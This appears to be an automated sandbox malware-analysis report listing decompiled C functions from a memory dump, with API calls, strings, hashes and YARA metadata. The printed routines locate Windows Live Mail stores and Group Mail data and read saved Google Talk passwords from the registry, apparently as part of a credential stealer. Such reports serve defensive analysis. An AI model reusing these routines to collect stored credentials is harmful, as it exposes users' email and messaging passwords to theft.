                                                                                                                                                                  0x00412281
                                                                                                                                                                  0x0041226e
                                                                                                                                                                  0x0041226e
                                                                                                                                                                  0x0041226e
                                                                                                                                                                  0x00412289
                                                                                                                                                                  0x0041228e
                                                                                                                                                                  0x00412290
                                                                                                                                                                  0x00412296
                                                                                                                                                                  0x00412299
                                                                                                                                                                  0x00412299
                                                                                                                                                                  0x0041229f
                                                                                                                                                                  0x004122d4
                                                                                                                                                                  0x004122df

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3662548030-0
                                                                                                                                                                  • Opcode ID: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
                                                                                                                                                                  • Instruction ID: c2e845550ef1ad64eb6aea8f75856b2ed0c0391cefdfa0dcc66b3553e8bd0076
                                                                                                                                                                  • Opcode Fuzzy Hash: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
                                                                                                                                                                  • Instruction Fuzzy Hash: 46419070D04249EFCB209FA4D9496ED7BB4EB09315F2081BBE861D7291D7B859D2CB1C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004113C4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E004113C4(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040F4CA( &_v796, _t64); // executed
				E00406763( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E004112EC(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040F4CA(_t61, _t66);
				E00406763(_t61, "\\Microsoft\\Windows Live Mail");
				E004112EC(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040F232(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L00412072();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E004112EC(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                                                                                                                                  0x004113c4
                                                                                                                                                                  0x004113e0
                                                                                                                                                                  0x004113e5
                                                                                                                                                                  0x004113f2
                                                                                                                                                                  0x004113f3
                                                                                                                                                                  0x004113f7
                                                                                                                                                                  0x004113fe
                                                                                                                                                                  0x00411408
                                                                                                                                                                  0x0041140d
                                                                                                                                                                  0x00411416
                                                                                                                                                                  0x0041141b
                                                                                                                                                                  0x00411424
                                                                                                                                                                  0x00411425
                                                                                                                                                                  0x0041142f
                                                                                                                                                                  0x0041143b
                                                                                                                                                                  0x0041144b
                                                                                                                                                                  0x00411453
                                                                                                                                                                  0x00411466
                                                                                                                                                                  0x0041146e
                                                                                                                                                                  0x0041148e
                                                                                                                                                                  0x00411493
                                                                                                                                                                  0x004114a7
                                                                                                                                                                  0x004114b5
                                                                                                                                                                  0x004114bd
                                                                                                                                                                  0x004114bf
                                                                                                                                                                  0x004114c9
                                                                                                                                                                  0x004114cb
                                                                                                                                                                  0x004114cb
                                                                                                                                                                  0x004114c9
                                                                                                                                                                  0x004114d5
                                                                                                                                                                  0x004114d6
                                                                                                                                                                  0x004114da
                                                                                                                                                                  0x004114db
                                                                                                                                                                  0x004114e0
                                                                                                                                                                  0x004114e4
                                                                                                                                                                  0x004114f1
                                                                                                                                                                  0x004114f1
                                                                                                                                                                  0x004114fc

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004113E5
                                                                                                                                                                    • Part of subcall function 00406763: strlen.MSVCRT ref: 00406765
                                                                                                                                                                    • Part of subcall function 00406763: strlen.MSVCRT ref: 00406770
                                                                                                                                                                    • Part of subcall function 00406763: strcat.MSVCRT(00000000,0041140D,0000001C,0041140D,\Microsoft\Windows Mail,?,?,?), ref: 00406787
                                                                                                                                                                    • Part of subcall function 0040F4CA: memset.MSVCRT ref: 0040F51F
                                                                                                                                                                    • Part of subcall function 0040F4CA: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                                                                                                                                                                    • Part of subcall function 0040F4CA: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                                                                                                                                                                  • memset.MSVCRT ref: 00411453
                                                                                                                                                                  • memset.MSVCRT ref: 0041146E
                                                                                                                                                                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004114A7
                                                                                                                                                                  • strlen.MSVCRT ref: 004114B5
                                                                                                                                                                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 004114DB
                                                                                                                                                                  Strings
                                                                                                                                                                  • \Microsoft\Windows Live Mail, xrefs: 0041142A
                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00411484
                                                                                                                                                                  • Store Root, xrefs: 0041147F
                                                                                                                                                                  • \Microsoft\Windows Mail, xrefs: 00411403
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                                                                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                  • API String ID: 4071991895-2578778931
                                                                                                                                                                  • Opcode ID: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                                                                                                                                                                  • Instruction ID: e9664ad0f3b84b924b74ee59ba002f7e9f43dcf230935329a4dad2143823624c
                                                                                                                                                                  • Opcode Fuzzy Hash: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                                                                                                                                                                  • Instruction Fuzzy Hash: 45317772504348ABD320EBA9DD46FCB7BDC9B88714F00442FF649D7182EA78D55487AA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040378B, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E0040378B(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00411622(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E00402197( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060DA(_t50,  &_v276);
				_t59 =  &_v404;
				E004060DA(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E004023C6( &_v936, _t70, _a4);
			}






















                                                                                                                                                                  0x0040378b
                                                                                                                                                                  0x0040378b
                                                                                                                                                                  0x004037a6
                                                                                                                                                                  0x004037ac
                                                                                                                                                                  0x004037ba
                                                                                                                                                                  0x004037c0
                                                                                                                                                                  0x004037d6
                                                                                                                                                                  0x004037dd
                                                                                                                                                                  0x004038a6
                                                                                                                                                                  0x004038a6
                                                                                                                                                                  0x004037ea
                                                                                                                                                                  0x004037f5
                                                                                                                                                                  0x004037f8
                                                                                                                                                                  0x004037ff
                                                                                                                                                                  0x0040380b
                                                                                                                                                                  0x00403811
                                                                                                                                                                  0x0040381b
                                                                                                                                                                  0x00403825
                                                                                                                                                                  0x00403837
                                                                                                                                                                  0x00403842
                                                                                                                                                                  0x00403843
                                                                                                                                                                  0x00403863
                                                                                                                                                                  0x00403878
                                                                                                                                                                  0x0040387d
                                                                                                                                                                  0x00403845
                                                                                                                                                                  0x0040384c
                                                                                                                                                                  0x00403853
                                                                                                                                                                  0x00403853
                                                                                                                                                                  0x0040388e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004037AC
                                                                                                                                                                  • memset.MSVCRT ref: 004037C0
                                                                                                                                                                    • Part of subcall function 00411622: memset.MSVCRT ref: 00411644
                                                                                                                                                                    • Part of subcall function 00411622: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                                                                                                                                                                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                  • strchr.MSVCRT ref: 0040382F
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040384C
                                                                                                                                                                  • strlen.MSVCRT ref: 00403858
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403878
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040388E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                  • String ID: %s@yahoo.com
                                                                                                                                                                  • API String ID: 1649821605-3288273942
                                                                                                                                                                  • Opcode ID: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                                                                                                                                                                  • Instruction ID: fac56a1422f5c84d721e9c9d17906f33e473bda0e694fa5a8ecc328811f6b8f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                                                                                                                                                                  • Instruction Fuzzy Hash: 952186B3D0012C6EDB21EA54DD41BDA77AC9F45348F0401EBF649F6181E6B8AF848F69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004034A5, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004034A5(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040F232(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F29(_t28);
					strcat(_t28, "fb.dat");
					return E004033B1(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                                                                                                                                  0x004034a5
                                                                                                                                                                  0x004034be
                                                                                                                                                                  0x004034c5
                                                                                                                                                                  0x004034d4
                                                                                                                                                                  0x004034db
                                                                                                                                                                  0x004034fb
                                                                                                                                                                  0x00403505
                                                                                                                                                                  0x00403516
                                                                                                                                                                  0x0040351b
                                                                                                                                                                  0x00403521
                                                                                                                                                                  0x0040352e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403540
                                                                                                                                                                  0x00403543

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004034C5
                                                                                                                                                                  • memset.MSVCRT ref: 004034DB
                                                                                                                                                                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                  • strcpy.MSVCRT(00000000,00000000), ref: 00403516
                                                                                                                                                                    • Part of subcall function 00405F29: strlen.MSVCRT ref: 00405F2A
                                                                                                                                                                    • Part of subcall function 00405F29: strcat.MSVCRT(00000000,00414078,004062C9,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 00405F41
                                                                                                                                                                  • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 0040352E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetstrcat$Closestrcpystrlen
                                                                                                                                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                  • API String ID: 1387626053-966475738
                                                                                                                                                                  • Opcode ID: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                                                                                                                                                                  • Instruction ID: 36ed55b5d374e154850240320204e9d1b3c473ccad1168af83c786b56a3c059d
                                                                                                                                                                  • Opcode Fuzzy Hash: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 8201D8B294012879D720E655DD46FCA7A6C5F34745F0000E6BA48F21C2DAFCABD58B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B91E, Relevance: 9.1, APIs: 6, Instructions: 71stringwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E0040B91E(intOrPtr __eax, intOrPtr* __ebx) {
				struct HICON__* _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				struct HICON__* _t28;
				intOrPtr* _t35;
				void* _t37;

				_t35 = __ebx;
				_t21 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41457c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L00412090();
				if(__eax == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *0x418114 = __eax;
				}
				 *((intOrPtr*)(_t35 + 0x36c)) = _t21;
				L00412090(); // executed
				_t49 = _t21;
				_t37 = 0xf38;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00404026(_t21, _t49);
				}
				 *((intOrPtr*)(_t35 + 0x370)) = _t22;
				 *((intOrPtr*)(_t35 + 0x378)) = 0;
				 *((intOrPtr*)(_t35 + 0x260)) = 0;
				 *((intOrPtr*)(_t35 + 0x25c)) = 0;
				 *((intOrPtr*)(_t35 + 0x154)) = 0;
				_t23 =  *(_t35 + 0x258);
				if(_t23 != 0) {
					DeleteObject(_t23);
					 *(_t35 + 0x258) = 0;
				}
				_t24 = E0040625C(); // executed
				 *(_t35 + 0x258) = _t24;
				E004019DA(_t37, _t35 + 0x158, 0x414490);
				_v264 = 0;
				memset( &_v263, 0, 0xff);
				_t28 = LoadIconA( *0x417b94, 0x65); // executed
				_v8 = _t28;
				strcpy(_t35 + 4, E004019DA(_t37,  &_v264, 0x414478));
				 *(_t35 + 0x104) = _v8;
				return _t35;
			}















                                                                                                                                                                  0x0040b91e
                                                                                                                                                                  0x0040b91e
                                                                                                                                                                  0x0040b92b
                                                                                                                                                                  0x0040b931
                                                                                                                                                                  0x0040b937
                                                                                                                                                                  0x0040b93d
                                                                                                                                                                  0x0040b93f
                                                                                                                                                                  0x0040b945
                                                                                                                                                                  0x0040b94d
                                                                                                                                                                  0x0040b956
                                                                                                                                                                  0x0040b956
                                                                                                                                                                  0x0040b94f
                                                                                                                                                                  0x0040b94f
                                                                                                                                                                  0x0040b94f
                                                                                                                                                                  0x0040b95d
                                                                                                                                                                  0x0040b963
                                                                                                                                                                  0x0040b968
                                                                                                                                                                  0x0040b96a
                                                                                                                                                                  0x0040b96b
                                                                                                                                                                  0x0040b976
                                                                                                                                                                  0x0040b976
                                                                                                                                                                  0x0040b96d
                                                                                                                                                                  0x0040b96f
                                                                                                                                                                  0x0040b96f
                                                                                                                                                                  0x0040b978
                                                                                                                                                                  0x0040b97e
                                                                                                                                                                  0x0040b984
                                                                                                                                                                  0x0040b98a
                                                                                                                                                                  0x0040b990
                                                                                                                                                                  0x0040b996
                                                                                                                                                                  0x0040b99e
                                                                                                                                                                  0x0040b9a1
                                                                                                                                                                  0x0040b9a7
                                                                                                                                                                  0x0040b9a7
                                                                                                                                                                  0x0040b9ad
                                                                                                                                                                  0x0040b9bd
                                                                                                                                                                  0x0040b9c3
                                                                                                                                                                  0x0040b9d6
                                                                                                                                                                  0x0040b9dd
                                                                                                                                                                  0x0040b9ed
                                                                                                                                                                  0x0040b9fe
                                                                                                                                                                  0x0040ba0b
                                                                                                                                                                  0x0040ba16
                                                                                                                                                                  0x0040ba20

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$DeleteIconLoadObjectmemsetstrcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3205015851-0
                                                                                                                                                                  • Opcode ID: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
                                                                                                                                                                  • Instruction ID: 1611dc68708d9a603d76385fea93fddb5fcd3a07b13b65f331774950c43fbb3a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C2192F19002509BCB50EF758E897C97BA8AB44705F1444BBEE0CEF296D7B845818BAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004076B7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E004076B7(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E00412360(0x1110, __ecx);
				E004073B6(_a4); // executed
				_t29 = E0040F1B0(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040F276(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040F1B0(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040F1F1(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407570( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040F276(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                                                                                                                                  0x004076b7
                                                                                                                                                                  0x004076c2
                                                                                                                                                                  0x004076cc
                                                                                                                                                                  0x004076e0
                                                                                                                                                                  0x004076e5
                                                                                                                                                                  0x004076ea
                                                                                                                                                                  0x004076fd
                                                                                                                                                                  0x00407701
                                                                                                                                                                  0x00407705
                                                                                                                                                                  0x0040770a
                                                                                                                                                                  0x00407717
                                                                                                                                                                  0x004077ac
                                                                                                                                                                  0x004077ac
                                                                                                                                                                  0x004077b1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407735
                                                                                                                                                                  0x0040773a
                                                                                                                                                                  0x0040773f
                                                                                                                                                                  0x0040774f
                                                                                                                                                                  0x00407756
                                                                                                                                                                  0x00407774
                                                                                                                                                                  0x00407779
                                                                                                                                                                  0x0040778b
                                                                                                                                                                  0x00407794
                                                                                                                                                                  0x00407794
                                                                                                                                                                  0x00407796
                                                                                                                                                                  0x004077a7
                                                                                                                                                                  0x004077a7
                                                                                                                                                                  0x004077bb
                                                                                                                                                                  0x004077bb
                                                                                                                                                                  0x004077c2

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004073B6: memset.MSVCRT ref: 00407418
                                                                                                                                                                    • Part of subcall function 004073B6: memset.MSVCRT ref: 0040742C
                                                                                                                                                                    • Part of subcall function 004073B6: memset.MSVCRT ref: 00407446
                                                                                                                                                                    • Part of subcall function 004073B6: memset.MSVCRT ref: 0040745B
                                                                                                                                                                    • Part of subcall function 004073B6: GetComputerNameA.KERNEL32 ref: 0040747D
                                                                                                                                                                    • Part of subcall function 004073B6: GetUserNameA.ADVAPI32(?,?), ref: 00407491
                                                                                                                                                                    • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
                                                                                                                                                                    • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
                                                                                                                                                                    • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074CE
                                                                                                                                                                    • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074DD
                                                                                                                                                                    • Part of subcall function 004073B6: memcpy.MSVCRT ref: 004074EF
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 00407705
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • memset.MSVCRT ref: 00407756
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00407794
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004077BB
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Google\Google Talk\Accounts, xrefs: 004076D6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                  • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                  • API String ID: 2959138223-1079885057
                                                                                                                                                                  • Opcode ID: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                                                                                                                                                                  • Instruction ID: a99152f29cb3baba476c483fa4670b136c65b11177ef5495e630776d68c42b47
                                                                                                                                                                  • Opcode Fuzzy Hash: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 93219471408209BED610DE51DD42EABBBECEF84344F00043AB944D1192E635DD5D9BA7
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A6C6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040A6C6(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406F55(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L0041207E();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406F55(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A283(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E36();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406F65( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41848c == 0) {
						 *0x418490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41848c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A25D);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x417b98);
			}











                                                                                                                                                                  0x0040a6c9
                                                                                                                                                                  0x0040a6cb
                                                                                                                                                                  0x0040a6d3
                                                                                                                                                                  0x0040a6d8
                                                                                                                                                                  0x0040a6da
                                                                                                                                                                  0x0040a6dc
                                                                                                                                                                  0x0040a6e1
                                                                                                                                                                  0x0040a6e2
                                                                                                                                                                  0x0040a6e7
                                                                                                                                                                  0x0040a6f0
                                                                                                                                                                  0x0040a6f8
                                                                                                                                                                  0x0040a700
                                                                                                                                                                  0x0040a702
                                                                                                                                                                  0x0040a705
                                                                                                                                                                  0x0040a70b
                                                                                                                                                                  0x0040a712
                                                                                                                                                                  0x0040a70d
                                                                                                                                                                  0x0040a70d
                                                                                                                                                                  0x0040a70f
                                                                                                                                                                  0x0040a70f
                                                                                                                                                                  0x0040a713
                                                                                                                                                                  0x0040a714
                                                                                                                                                                  0x0040a714
                                                                                                                                                                  0x0040a719
                                                                                                                                                                  0x0040a71f
                                                                                                                                                                  0x0040a720
                                                                                                                                                                  0x0040a6da
                                                                                                                                                                  0x0040a725
                                                                                                                                                                  0x0040a730
                                                                                                                                                                  0x0040a73b
                                                                                                                                                                  0x0040a751
                                                                                                                                                                  0x0040a759
                                                                                                                                                                  0x0040a75f
                                                                                                                                                                  0x0040a767
                                                                                                                                                                  0x0040a76c
                                                                                                                                                                  0x0040a76c
                                                                                                                                                                  0x0040a782
                                                                                                                                                                  0x0040a790
